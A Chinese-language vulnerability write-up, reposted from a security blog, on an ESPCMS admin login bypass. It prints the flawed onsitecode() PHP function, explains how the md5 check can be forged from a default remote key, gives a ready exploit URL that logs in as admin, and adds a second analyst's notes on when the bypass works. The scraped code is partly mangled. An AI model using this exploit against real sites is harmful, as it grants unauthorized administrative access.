ESPCMS后台登陆绕过漏洞附EXP
时隔好久,童鞋相继发过这个CMS漏洞,今天大体看了下,问题还有,官方还是一直在修复漏洞。
问题出在后台文件adminsoft\control\adminuser.php文件
代码问题出在函数onsitecode()
function onsitecode() { parent::start_template(); $db_table = db_prefix . "admin_member"; $linkURL = $_SERVER['HTTP_REFERER']; $siteid = $this-fun-accept('siteid', 'R'); $code = $this-fun-accept('code', 'R'); $adminid = $this-fun-accept('adminid', 'R'); $siteip = $this-fun-real_server_ip(); //echo $adminid; if (empty($siteid) || empty($code) || empty($siteip) || empty($this-CON['sitecoedb']) || empty($adminid)) { exit(); } $codelist = md5($this-CON['sitecoedb'] . '_' . $siteip . '_' . adminfile); if ($code == $codelist) { $db_where = "username='$adminid' AND isclass=1 AND isremote=1"; $rsMember = $this-db-fetch_first('SELECT id,username,password,powergroup,inputclassid,isclass,isremote FROM ' . $db_table . ' WHERE ' . $db_where); if (!$rsMember) { exit('ESPCMS:Parameter error!'); } else { $ipadd = $this-fun-ip($_SERVER['REMOTE_ADDR']); $date = time(); $db_set = "intime=$date,ipadd=$ipadd,hit=hit+1"; $this-db-query('UPDATE ' . $db_table . ' SET ' . $db_set . ' WHERE ' . $db_where); $db_table = db_prefix . 'admin_powergroup'; $db_where = 'id=' . $rsMember['powergroup']; $rsPower = $this-db-fetch_first('SELECT powername,powerlist FROM ' . $db_table . ' WHERE ' . $db_where); if ($rsPower['powerlist'] != 'all') { $rsPower_array = explode('|', $rsPower['powerlist']); $rsPower_array = is_array($rsPower_array) ? $this-fun-exp_array($rsPower_array) : $rsPower_array; $sysArray = $this-get_powermenulist('all'); $sys_newsArray = array(); foreach ($sysArray as $key = $value) { $sys_newsArray[] = $value['loadfun']; } $sys_newsArray = $this-fun-exp_array($sys_newsArray); $diff_array = array_diff($sys_newsArray, $rsPower_array); $rsPower['powerlist'] = implode('|', $diff_array); } $this-fun-setcookie("esp_powerlist", $this-fun-eccode($rsPower['powerlist'], 'ENCODE', db_pscode)); $this-fun-setcookie('ecisp_admininfo', $this-fun-eccode("$rsMember[id]|$rsMember[username]|$rsMember[password]|" . md5($_SERVER['HTTP_USER_AGENT']) . '|' . $rsMember[powergroup] . '|' . $rsMember[inputclassid] . '|' . md5(admin_ClassURL), 'ENCODE', db_pscode)); $this-writelog($this-lng['adminuser_login_log_action'], $this-lng['log_extra_ok'] . ' user=' . $rsMember['username'], $rsMember['username']); header('location: index.php?archive=managementaction=tabloadfun=mangercenterout=tabcenter'); exit('true'); } } exit(); }
只要$code == $codelist就通过验证,那么我们可以自己构造,主要就是
$codelist = md5($this-CON['sitecoedb'] . ‘_’ . $siteip . ‘_’ . adminfile);
测试代码如下
index.php?archive=adminuseraction=sitecodeadminid=adminsiteid=1code=f01f70868bbd44aba6ffc8602367abea
直接访问登录后台。
漏洞作者:j8g
Seay分析:
找到j8说的这个文件,看了下确实存在这个问题,不过也有点鸡肋。
给出的exp
adminsoft/index.php?archive=adminuseraction=sitecodeadminid=adminsiteid=1code=f01f70868bbd44aba6ffc8602367abea
一、看到
if (empty($siteid) || empty($code) || empty($siteip) || empty($this-CON['sitecoedb']) || empty($adminid)) {
exit();
}
$codelist = md5($this-CON['sitecoedb'] . '_' . $siteip . '_' . adminfile);但是默认CON['sitecoedb']是为空的,要在后台更新一下设置才会变成
//远程通信密钥
'sitecoedb'='7a6355a4a18b136036439cc61efe069b',这个是默认的,一般不会有什么人改。
二、
看到
if ($code == $codelist) {
$db_where = "username='$adminid' AND isclass=1 AND isremote=1";
$rsMember = $this-db-fetch_first('SELECT id,username,password,powergroup,inputclassid,isclass,isremote FROM ' . $db_table . ' WHERE ' . $db_where);
echo 'SELECT id,username,password,powergroup,inputclassid,isclass,isremote FROM ' . $db_table . ' WHERE ' . $db_where;
if (!$rsMember) {
exit('ESPCMS:Parameter error!');
} else {$db_where = “username=’$adminid’ AND isclass=1 AND isremote=1″;
在where条件中
需要isremote=1才能成功查询到数据。
专门找了下这个参数,是要adminid这个管理员是集群管理员才会是1,
而默认这个是0,要管理员在后台的管理员设置成集群管理员这个漏洞才能成功利用。
转自:http://www.cnseay.com/2712/